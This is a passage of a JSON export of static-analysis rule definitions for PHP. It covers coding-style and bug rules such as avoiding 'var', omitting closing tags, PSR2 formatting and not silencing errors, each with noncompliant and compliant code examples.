Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n executed <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n <li> <a href='\/coding_rules#rule_key=php%3AS1656'>S1656<\/a> - Implements a check on <code>=<\/code>. <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1765","repo":"php","name":"The \"var\" keyword should not be used","htmlDesc":"<p>The PHP 4 method of declaring a variable, using the <code>var<\/code> keyword, was deprecated in early versions of PHP 5. Even though it's not\nconsidered deprecated in the most recent versions, it's nonetheless not best practice to use it. When <code>var<\/code> does appear, it is interpreted\nas a synonym for <code>public<\/code> and treated as such. Therefore <code>public<\/code> should be used instead.<\/p>\n<p>From the PHP Manual:<\/p>\n<blockquote>\n <p>The PHP 4 method of declaring a variable with the var keyword is still supported for compatibility reasons (as a synonym for the public keyword).\n In PHP 5 before 5.1.3, its usage would generate an E_STRICT warning.<\/p>\n<\/blockquote>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n<?php\nclass Foo\n{\n var $bar = 1;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n<?php\nclass Foo\n{\n public $bar = 1;\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1766","repo":"php","name":"More than one property should not be declared per statement","htmlDesc":"<p>For better readability, do not put multiple property declarations in the same statement.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n<?php\nclass Foo\n{\n private $bar = 1, $bar2 = 2;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n<?php\nclass Foo\n{\n private $bar1 = 1;\n private $bar2 = 2;\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1779","repo":"php","name":"Only LF character (Unix-like) should be used to end lines","htmlDesc":"<p>All developers should use the same end-line character(s) to prevent polluting the history changelog of source files in the SCM engine. Moreover\nsome SCM engines like Git might sometimes badly support use of Windows 'CRLF' end of line characters.<\/p>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1780","repo":"php","name":"Closing tag \"?>\" should be omitted on files containing only PHP","htmlDesc":"<p>According to the PSR2 coding standard:<\/p>\n<blockquote>\n <p>The closing <code>?><\/code> tag should be omitted from files containing only PHP.<\/p>\n<\/blockquote>\n<p>According to the PHP manual:<\/p>\n<blockquote>\n <p>in some cases omitting it is helpful when using include or require, so unwanted whitespace will not occur at the end of files, and you will still\n be able to add headers to the response later. It is also handy if you use output buffering, and would not like to see added unwanted whitespace at\n the end of the parts generated by the included files.<\/p>\n<\/blockquote>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1781","repo":"php","name":"PHP keywords and constants \"true\", \"false\", \"null\" should be lower case","htmlDesc":"<p>Using indifferently lower or upper case for PHP keywords and constants \"true\", \"false\" and \"null\" can impact the readability of PHP source\ncode.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n<?php ECHO 'Hello World'; ?>\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n<?php echo 'Hello World'; ?>\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1784","repo":"php","name":"Method visibility should be explicitly declared","htmlDesc":"<p>Class methods may be defined as public, private, or protected. Methods declared without any explicit visibility keyword are defined as public. To\nprevent any misunderstanding, this visibility should always be explicitly declared.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction foo(){...}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic function foo(){...}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1788","repo":"php","name":"Method arguments with default values should be last","htmlDesc":"<p>The ability to define default values for method arguments can make a method easier to use. Default argument values allow callers to specify as many\nor as few arguments as they want while getting the same functionality and minimizing boilerplate, wrapper code. <\/p>\n<p>But all method arguments with default values should be declared after the method arguments without default values. Otherwise, it makes it\nimpossible for callers to take advantage of defaults; they must re-specify the defaulted values in order to \"get to\" the non-default arguments.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction makeyogurt($type = \"acidophilus\", $flavor){...} \/\/ Noncompliant\n\nmakeyogurt(\"raspberry\")}} \/\/ Runtime error: Missing argument 2 in call to makeyogurt()\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction makeyogurt($flavor, $type = \"acidophilus\", ){...}\n\nmakeyogurt(\"raspberry\")}} \/\/ Works as expected\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1793","repo":"php","name":"\"elseif\" keyword should be used in place of \"else if\" keywords","htmlDesc":"<p>According to the PSR2 coding standard:<\/p>\n<blockquote>\n <p>The keyword <code>elseif<\/code> SHOULD be used instead of <code>else if<\/code> so that all control keywords look like single words.<\/p>\n<\/blockquote>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ($expr1) {\n ...\n} else if ($expr2) {\n ...\n} else {...}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif ($expr1) {\n ...\n} elseif ($expr2) {\n ...\n} else {...}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1799","repo":"php","name":"\"exit(...)\" and \"die(...)\" statements should not be used","htmlDesc":"<p>The <code>exit(...)<\/code> and <code>die(...)<\/code> statements should absolutely not be used in Web PHP pages as this might lead to a very bad\nuser experience. In such case, the end user might have the feeling that the web site is down or has encountered a fatal error. <\/p>\n<p>But of course PHP can also be used to develop command line application and in such case use of <code>exit(...)<\/code> or <code>die(...)<\/code>\nstatement can be justified but must remain limited and not spread all over the application. We expect exceptions to be used to handle errors and those\nexceptions should be caught just before leaving the application to specify the exit code with help of <code>exit(...)<\/code> or <code>die(...)<\/code>\nstatements.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Foo {\n public function bar($param) {\n if ($param === 42) {\n exit(23);\n }\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Foo {\n public function bar($param) {\n if ($param === 42) {\n throw new Exception('Value 42 is not expected.');\n }\n }\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1808","repo":"php","name":"Source code should comply with formatting standards","htmlDesc":"<p>Shared coding conventions make it possible for a team to collaborate efficiently. This rule raises issues for failures to comply with formatting\nstandard. The default parameter values conform to the PSR2 standard.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default PSR2 parameter values:<\/p>\n<pre>\nuse FooClass;\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002 \/\/ Noncompliant; the \"use\" declaration should be placed after the \"namespace\" declaration\n\nnamespace Vendor\\Package;\nuse FooClass;\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002 \/\/ Noncompliant; the \"namespace\" declaration should be followed by a blank line\n$foo = 1;\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002 \/\/ Noncompliant; the \"use\" declaration should be followed by a blank line\n\nclass ClassA {\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002 \u2002 \u2002\/\/ Noncompliant; an open curly brace should be at the beginning of a new line for classes and functions\n\u2002\u2002function my_function(){ \u2002\/\/ Noncompliant; curly brace on wrong line\n\u2002\u2002\u2002\u2002if ($firstThing)\u2002\u2002\u2002\u2002\u2002\u2002\u2002\/\/ Noncompliant; an open curly brace should be at the end of line for a control structure\n\u2002\u2002\u2002\u2002{\n\u2002\u2002\u2002\u2002\u2002\u2002...\n\u2002\u2002\u2002\u2002}\n\n\u2002\u2002\u2002\u2002if ($secondThing)\u2002 {\u2002\/\/ Noncompliant; there should be exactly one space between the closing parenthesis and the opening curly brace\n\u2002\u2002\u2002\u2002\u2002\u2002...\n\u2002\u2002\u2002\u2002}\n\n if($thirdThing) { \/\/ Noncompliant; there should be exactly one space between the control structure keyword and the opening parenthesis\n ...\n }\n else { \/\/ Noncompliant; the close curly brace and the next \"else\" (or \"catch\" or \"finally\") keyword should be located on the same line\n ...\n }\n\n try{ \/\/ Noncompliant; there should be exactly one space between the control structure keyword and the curly brace\n ...\n } catch (Exception $e) {\n\u2002\u2002 }\n\n analyse( $fruit ) ; \/\/ Noncompliant; there should not be any space after the opening parenthesis and before the closing parenthesis\n\n for ($i = 0;$i < 10; $i++) { \/\/ Nomcompliant; there should be exactly one space after each \";\" in the {{for}} statement\n ...\n }\n\n pressJuice($apply ,$orange); \/\/ Noncompliant; the comma should be followed by one space and not preceded by any\n\n do_something (); \/\/ Noncompliant; there should not be any space after the method name\n\n foreach ($fruits as $fruit_key => $fruit) { \/\/ Noncompliant; in the foreach statement there should be one space before and after \"as\" keyword and \"=>\" operator\n ...\n }\n }\n}\n\nclass ClassB\nextends ParentClass \/\/ Noncompliant; the class name and the \"extends\" \/ \"implements\" keyword should be on the same line\n{\n ...\n}\n\nclass ClassC extends ParentClass implements \\ArrayAccess, \\Countable,\n \\Serializable \/\/ Noncompliant; the list of implemented interfaces should be correctly indented\n{\n\n public function aVeryLongMethodName(ClassTypeHint $arg1, \/\/ Noncompliant; the arguments in a method declaration should be correctly indented\n &$arg2, array $arg3 = []) {\n\n $noArgs_longVars = function () use ($longVar1, \/\/ Noncompliant; the arguments in a function declaration should be correctly indented\n $longerVar2,\n $muchLongerVar3\n ) {\n ...\n };\n\n $foo->bar($longArgument, \/\/ Noncompliant; the arguments in a method call should be correctly indented\n $longerArgument,\n $muchLongerArgument); \/\/ Noncompliant; the closing parenthesis should be placed on the next line\n\n $closureWithArgsAndVars = function($arg1, $arg2)use ($var1, $var2) { \/\/ Noncompliant; the closure declaration should be correctly spaced - see (5)\n ...\n };\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nnamespace Vendor\\Package; \/\/ Compliant; the \"namespace\" declaration is followed by a blank line\n\nuse FooClass; \/\/ Compliant; the \"use\" declaration is placed after the \"namespace\" declaration\n \/\/ Compliant; the \"use\" declaration is followed by a blank line\n$foo = 1;\n\nclass ClassA\n{\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002 \u2002\/\/ Compliant; the open curly brace is at the beginning of a new line for the class\n\u2002\u2002function my_function()\n {\u2002\u2002\u2002\u2002 \/\/ Compliant; the open curly brace is at the beginning of a new line for the function\n\u2002\u2002\u2002\u2002if ($firstThing)\u2002{\u2002\u2002\u2002\u2002\/\/ Compliant; the open curly brace is at the end of line for the control structure\n\u2002\u2002\u2002\u2002\u2002\u2002...\n\u2002\u2002\u2002\u2002}\n\n\u2002\u2002\u2002\u2002if ($secondThing)\u2002{\u2002\u2002 \/\/ Compliant; there is exactly one space between the closing parenthesis and the opening curly brace\n\u2002\u2002\u2002\u2002\u2002\u2002...\n\u2002\u2002\u2002\u2002}\n\n if ($thirdThing) { \/\/ Compliant; there is exactly one space between the control structure keyword and the opening parenthesis\n ...\n } else { \/\/ Compliant; the close curly brace and the next \"else\" (or \"catch\" or \"finally\") keyword are located on the same line\n ...\n }\n\n try { \/\/ Compliant; there is exactly one space between the control structure keyword and the curly brace\n ...\n } catch (Exception $e) {\n ...\n }\n\n analyse($fruit); \/\/ Compliant: there is no space after the opening parenthesis, nor before the closing parenthesis\n\n for ($i = 0; $i < 10; $i++) { \/\/ Compliant: there is exactly one space after each \";\" in the {{for}} statement\n ...\n }\n\n pressJuice($apply, $orange); \/\/ Compliant; the comma is followed by one space and is not preceded by any\n\n do_something(); \/\/ Compliant; there is no space after the method name\n\n foreach ($fruits as $fruit_key => $fruit) { \/\/ Compliant; in the foreach statement there is one space before and after \"as\" keyword and \"=>\" operator\n ...\n }\n }\n}\n\n\/* The idea here is to make it obvious at first glance that a class extends\n * some other classes and\/or implements some interfaces. The names of\n * extended classes or implemented interfaces can be located on subsequent lines.\n *\/\nclass ClassB1 extends ParentClass \/\/ Compliant; the class name and the \"extends\" (or \"implements\") keyword are located on the same line\n{\n ...\n}\n\nclass ClassB2 extends \/\/ Compliant; the class name and the \"extends\" (or \"implements\") keyword are located on the same line\nParentClass {\n ...\n}\n\n\/* Lists of implements may be split across multiple lines, where each subsequent line\n * is indented once. When doing so, the first item in the list should be on the next line,\n * and there should be only one interface per line.\n *\/\nclass ClassC extends ParentClass implements\n \\ArrayAccess, \/\/ Compliant; the list of implemented interfaces is correctly indented\n \\Countable,\n \\Serializable\n{\n \/* Argument lists may be split across multiple lines, where each subsequent line\n * is indented once. When doing so, the first item in the list should be on the next line,\n * and there should be only one argument per line. Also, when the argument list is\n * split across multiple lines, the closing parenthesis and opening brace should be\n * placed together on their own line with one space between them.\n *\/\n public function aVeryLongMethodName(\n ClassTypeHint $arg1, \/\/ Compliant; the arguments in a method\/function declaration are correctly indented\n &$arg2,\n array $arg3 = []\n ) {\n $noArgs_longVars = function () use (\n $longVar1, \/\/ Compliant; the arguments in a method\/function declaration are correctly indented\n $longerVar2,\n $muchLongerVar3\n ) {\n ...\n };\n\n\n \/* Argument lists may be split across multiple lines, where each subsequent line is\n * indented once. When doing so, the first item in the list should be on the next line,\n * and there should be only one argument per line.\n *\/\n $foo->bar(\n $longArgument, \/\/ Compliant; the arguments in the method call are be correctly indented\n $longerArgument,\n $muchLongerArgument\n ); \/\/ Compliant; the closing parenthesis is placed on a separate line\n\n \/* Closures should be declared with a space after the \"function\" keyword,\n * and a space before and after the \"use\" keyword.\n *\/\n $closureWithArgsAndVars = function ($arg1, $arg2) use ($var1, $var2) { \/\/ Compliant; the closure declaration is correctly spaced\n ...\n };\n }\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[{"key":"extends_implements_line","htmlDesc":"Class names, "extends" and "implements" keywords should be located on the same line","defaultValue":"true","type":"BOOLEAN"},{"key":"no_space_method_name","htmlDesc":"There should not be any space after a method name","defaultValue":"true","type":"BOOLEAN"},{"key":"closure_format","htmlDesc":"Closures declaration should be correctly spaced","defaultValue":"true","type":"BOOLEAN"},{"key":"space_comma","htmlDesc":"Commas should be followed by one space and not preceded by any","defaultValue":"true","type":"BOOLEAN"},{"key":"open_curly_brace_classes_functions","htmlDesc":"Open curly braces should be at the beginning of a new line for classes and functions","defaultValue":"true","type":"BOOLEAN"},{"key":"namespace_blank_line","htmlDesc":""namespace" declarations should be followed by a blank line","defaultValue":"true","type":"BOOLEAN"},{"key":"open_curly_brace_control_structures","htmlDesc":"Open curly braces should be at the end of line for control structures","defaultValue":"true","type":"BOOLEAN"},{"key":"one_space_after","htmlDesc":"There should be exactly one space between closing parenthesis and opening curly braces","defaultValue":"true","type":"BOOLEAN"},{"key":"interfaces_indentation","htmlDesc":"List of implemented interfaces should be correctly indented","defaultValue":"true","type":"BOOLEAN"},{"key":"foreach_space","htmlDesc":"In foreach statement there should be one space before and after "as" keyword and "=>" operator","defaultValue":"true","type":"BOOLEAN"},{"key":"no_space","htmlDesc":"There should not be any space after the opening parenthesis and before the closing parenthesis","defaultValue":"true","type":"BOOLEAN"},{"key":"function_calls_arguments_indentation","htmlDesc":"Arguments in method\/function calls should be correctly indented","defaultValue":"true","type":"BOOLEAN"},{"key":"closing_curly_brace","htmlDesc":"Close curly brace and the next "else", "catch" and "finally" keywords should be located on the same line","defaultValue":"true","type":"BOOLEAN"},{"key":"function_declaration_arguments_indentation","htmlDesc":"Arguments in method\/function declarations should be correctly indented","defaultValue":"true","type":"BOOLEAN"},{"key":"use_blank_line","htmlDesc":""use" declarations should be followed by a blank line","defaultValue":"true","type":"BOOLEAN"},{"key":"one_space_for","htmlDesc":"There should be one space after each ";" in "for" statement","defaultValue":"true","type":"BOOLEAN"},{"key":"use_after_namespace","htmlDesc":""use" declarations should be placed after "namespace" declarations","defaultValue":"true","type":"BOOLEAN"},{"key":"one_space_before","htmlDesc":"There should be exactly one space between control structure keyword and opening parenthesis or curly brace","defaultValue":"true","type":"BOOLEAN"}],"type":"CODE_SMELL"},{"key":"php:S1848","repo":"php","name":"Objects should not be created to be dropped immediately without being used","htmlDesc":"<p>There is no good reason to create a new object to not do anything with it. Most of the time, this is due to a missing piece of code and so could\nlead to an unexpected behavior in production.<\/p>\n<p>If it was done on purpose because the constructor has side-effects, then that side-effect code should be moved into a separate, static method and\ncalled directly.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ($x < 0) {\n new foo; \/\/ Noncompliant\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$var = NULL;\nif ($x < 0) {\n $var = new foo;\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1862","repo":"php","name":"Related \"if\/else if\" statements and \"cases\" in a \"switch\" should not have the same condition","htmlDesc":"<p>A <code>switch<\/code> and a chain of <code>if<\/code>\/<code>else if<\/code> statements is evaluated from top to bottom. At most, only one branch will\nbe executed: the first one with a condition that evaluates to <code>true<\/code>.<\/p>\n<p>Therefore, duplicating a condition automatically leads to dead code. Usually, this is due to a copy\/paste error. At best, it's simply dead code and\nat worst, it's a bug that is likely to induce further bugs as the code is maintained, and obviously it could lead to unexpected behavior.<\/p>\n<p>For a <code>switch<\/code>, if the first case ends with a <code>break<\/code>, the second case will never be executed, rendering it dead code. Worse\nthere is the risk in this situation that future maintenance will be done on the dead case, rather than on the one that's actually used.<\/p>\n<p>On the other hand, if the first case does not end with a <code>break<\/code>, both cases will be executed, but future maintainers may not notice\nthat.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ($param == 1)\n openWindow();\nelse if ($param == 2)\n closeWindow();\nelse if ($param == 1) \/\/ Noncompliant\n moveWindowToTheBackground();\n\n\nswitch($i) {\n case 1:\n \/\/...\n break;\n case 3:\n \/\/...\n break;\n case 1: \/\/ Noncompliant\n \/\/...\n break;\n default:\n \/\/ ...\n break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif ($param == 1)\n openWindow();\nelse if ($param == 2)\n closeWindow();\nelse if ($param == 3)\n moveWindowToTheBackground();\n\nswitch($i) {\n case 1:\n \/\/...\n break;\n case 3:\n \/\/...\n break;\n default:\n \/\/ ...\n break;\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n executed <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1871","repo":"php","name":"Two branches in the same conditional structure should not have exactly the same implementation","htmlDesc":"<p>Having two <code>cases<\/code> in the same <code>switch<\/code> statement or branches in the same <code>if<\/code> structure with the same\nimplementation is at best duplicate code, and at worst a coding error. If the same logic is truly needed for both instances, then in an\n<code>if<\/code> structure they should be combined, or for a <code>switch<\/code>, one should fall through to the other. <\/p>\n<p>Moreover when the second and third operands of a ternary operator are the same, the operator will always return the same value regardless of the\ncondition. Either the operator itself is pointless, or a mistake was made in coding it.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch ($i) {\n case 1:\n doSomething();\n break;\n case 2:\n doSomethingDifferent();\n break;\n case 3: \/\/ Noncompliant; duplicates case 1's implementation\n doSomething();\n break;\n default:\n doTheRest();\n}\n\nif ($a >= 0 && $a < 10) {\n doTheThing();\nelse if ($a >= 10 && $a < 20) {\n doTheOtherThing();\n}\nelse if ($a >= 20 && $a < 50) {\n doTheThing(); \/\/ Noncompliant; duplicates first condition\n}\nelse {\n doTheRest();\n}\n\nif ($b == 0) {\n doOneMoreThing();\n}\nelse {\n doOneMoreThing(); \/\/ Noncompliant; duplicates then-branch\n}\n\nvar b = a ? 12 > 4 : 4; \/\/ Noncompliant; always results in the same value\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch ($i) {\n case 1:\n case 3:\n doSomething();\n break;\n case 2:\n doSomethingDifferent();\n break;\n default:\n doTheRest();\n}\n\nif (($a >= 0 && $a < 10) || ($a >= 20 && $a < 50)) {\n doTheThing();\nelse if ($a >= 10 && $a < 20) {\n doTheOtherThing();\n}\nelse {\n doTheRest();\n}\n\ndoOneMoreThing();\n\nb = 4;\n<\/pre>\n<p>or <\/p>\n<pre>\nswitch ($i) {\n case 1:\n doSomething();\n break;\n case 2:\n doSomethingDifferent();\n break;\n case 3:\n doThirdThing();\n break;\n default:\n doTheRest();\n}\n\nif ($a >= 0 && $a < 10) {\n doTheThing();\nelse if ($a >= 10 && $a < 20) {\n doTheOtherThing();\n}\nelse if ($a >= 20 && $a < 50) {\n doTheThirdThing();\n}\nelse {\n doTheRest();\n}\n\nif ($b == 0) {\n doOneMoreThing();\n}\nelse {\n doTheRest();\n}\n\nint b = a ? 12 > 4 : 8;\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1996","repo":"php","name":"Files should contain only one top-level class or interface each","htmlDesc":"<p>A file that grows too much tends to aggregate too many responsibilities and inevitably becomes harder to understand and therefore to maintain. This\nis doubly true for a file with multiple top-level classes and interfaces. It is strongly advised to divide the file into one top-level class or\ninterface per file.<\/p>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1997","repo":"php","name":"Files should not contain inline HTML","htmlDesc":"<p>Shared coding conventions allow teams to collaborate efficiently. To avoid the confusion that can be caused by tangling two coding languages in the\nsame file, inline HTML should be avoided.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n<?php\n$name = \"George\";\n?>\n<p> Hello <?php echo $name ?>!<\/p>\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>File having the extension <code>.phtml<\/code> are ignored by this rule because they are expected to have mixed PHP and HTML.<\/p>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1998","repo":"php","name":"References should not be passed to function calls","htmlDesc":"<p>Passing a reference to a function parameter means that any modifications the method makes to the parameter will be made to the original value as\nwell, since references have the effect of pointing two variables at the same memory space. This feature can be difficult to use correctly,\nparticularly if the callee is not expecting a reference, and the improper use of references in function calls can make code less efficient rather than\nmore efficient. <\/p>\n<p>Further, according to the PHP manual: <\/p>\n<blockquote>\n As of PHP 5.3.0, you will get a warning saying that \"call-time pass-by-reference\" is deprecated... And as of PHP 5.4.0, call-time pass-by-reference\n was removed, so using it will raise a fatal error.\n<\/blockquote>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nmyfun(&$name); \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nmyfun($name);\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/374\">MITRE, CWE-374<\/a> - Weakness Base Passing Mutable Objects to an Untrusted Method <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2000","repo":"php","name":"Files should not contain characters before \"<?php\"","htmlDesc":"<p>Having characters before <code><?php<\/code> can cause \"Cannot modify header information\" errors and similar problems with Ajax requests.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\ntest<?php \/\/Noncompliant\n\/\/ ...\n<\/pre>\n<p>and<\/p>\n<pre>\n\/\/ Noncompliant; newline before opening tag\n<?php\n\/\/ ...\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n<?php\n\/\/ ...\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2001","repo":"php","name":"Functions deprecated in PHP 5 should not be used","htmlDesc":"<p>Deprecated language features are those that have been retained temporarily for backward compatibility, but which will eventually be removed from\nthe language. In effect, deprecation announces a grace period to allow the smooth transition from the old features to the new ones. In that period, no\nuse of the deprecated features should be added to the code, and all existing uses should be gradually removed.<\/p>\n<p>The following functions were deprecated in PHP 5:<\/p>\n<table>\n <tbody>\n <tr>\n <th>Deprecated<\/th>\n <th>Use Instead<\/th>\n <\/tr>\n <tr>\n <td><code>call_user_method()<\/code><\/td>\n <td><code>call_user_func()<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>call_user_method_array()<\/code><\/td>\n <td><code>call_user_func_array()<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>define_syslog_variables()<\/code><\/td>\n <td><\/td>\n <\/tr>\n <tr>\n <td><code>dl()<\/code><\/td>\n <td><\/td>\n <\/tr>\n <tr>\n <td><code>ereg()<\/code><\/td>\n <td><code>preg_match()<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>ereg_replace()<\/code><\/td>\n <td><code>preg_replace()<\/code> (note that this is deprecated in PHP 5.5)<\/td>\n <\/tr>\n <tr>\n <td><code>eregi()<\/code><\/td>\n <td><code>preg_match()<\/code> with 'i' modifier<\/td>\n <\/tr>\n <tr>\n <td><code>eregi_replace()<\/code><\/td>\n <td><code>preg_replace()<\/code> with 'i' modifier<\/td>\n <\/tr>\n <tr>\n <td><code>set_magic_quotes_runtime()<\/code> and its alias, <code>magic_quotes_runtime()<\/code><\/td>\n <td><\/td>\n <\/tr>\n <tr>\n <td><code>session_register()<\/code><\/td>\n <td><code>$_SESSION<\/code> superglobal<\/td>\n <\/tr>\n <tr>\n <td><code>session_unregister()<\/code><\/td>\n <td><code>$_SESSION<\/code> superglobal<\/td>\n <\/tr>\n <tr>\n <td><code>session_is_registered()<\/code><\/td>\n <td><code>$_SESSION<\/code> superglobal<\/td>\n <\/tr>\n <tr>\n <td><code>set_socket_blocking()<\/code><\/td>\n <td><code>stream_set_blocking()<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>split()<\/code><\/td>\n <td><code>preg_split()<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>spliti()<\/code><\/td>\n <td><code>preg_split()<\/code> with 'i' modifier<\/td>\n <\/tr>\n <tr>\n <td><code>sql_regcase()<\/code><\/td>\n <td><\/td>\n <\/tr>\n <tr>\n <td><code>mysql_db_query()<\/code><\/td>\n <td><code>mysql_select_db()<\/code> and <code>mysql_query()<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>mysql_escape_string()<\/code><\/td>\n <td><code>mysql_real_escape_string()<\/code><\/td>\n <\/tr>\n <tr>\n <td>Passing locale category names as strings<\/td>\n <td>Use the LC_* family of constants<\/td>\n <\/tr>\n <\/tbody>\n<\/table>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2002","repo":"php","name":"Errors should not be silenced","htmlDesc":"<p>Just as pain is your body's way of telling you something is wrong, errors are PHP's way of telling you there's something you need to fix. Neither\npain, nor PHP errors should be ignored.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n@doSomethingDangerous($password); \/\/ Noncompliant; '@' silences errors from function call\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\ndoSomethingDangerous($password);\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2003","repo":"php","name":"\"require_once\" and \"include_once\" should be used instead of \"require\" and \"include\"","htmlDesc":"<p>At root, <code>require<\/code>, <code>require_once<\/code>, <code>include<\/code>, and <code>include_once<\/code> all perform the same task of\nincluding one file in another. However, the way they perform that task differs, and they should not be used interchangeably.<\/p>\n<p><code>require<\/code> includes a file but generates a fatal error if an error occurs in the process.<\/p>\n<p><code>include<\/code> also includes a file, but generates only a warning if an error occurs.<\/p>\n<p>Predictably, the difference between <code>require<\/code> and <code>require_once<\/code> is the same as the difference between <code>include<\/code>\nand <code>include_once<\/code> - the \"_once\" versions ensure that the specified file is only included once. <\/p>\n<p>Because including the same file multiple times could have unpredictable results, the \"once\" versions are preferred.<\/p>\n<p>Because <code>include_once<\/code> generates only warnings, it should be used only when the file is being included conditionally, i.e. when all\npossible error conditions have been checked beforehand.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\ninclude 'code.php'; \/\/Noncompliant; not a \"_once\" usage and not conditional\ninclude $user.'_history.php'; \/\/ Noncompliant\nrequire 'more_code.php'; \/\/ Noncompliant; not a \"_once\" usage\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nrequire_once 'code.php';\nif (is_member($user)) {\n include_once $user.'_history.php';\n}\nrequire_once 'more_code.php';\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2004","repo":"php","name":"Functions should not be nested too deeply","htmlDesc":"<p>Nesting functions can quickly turn your code into \"spaghetti code\". Such code is hard to read, refactor and therefore to maintain.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default threshold of 3:<\/p>\n<pre>\nfunction f () {\n function f_inner () {\n function f_inner_inner() {\n function f_inner_inner_inner() { \/\/ Noncompliant\n }\n }\n 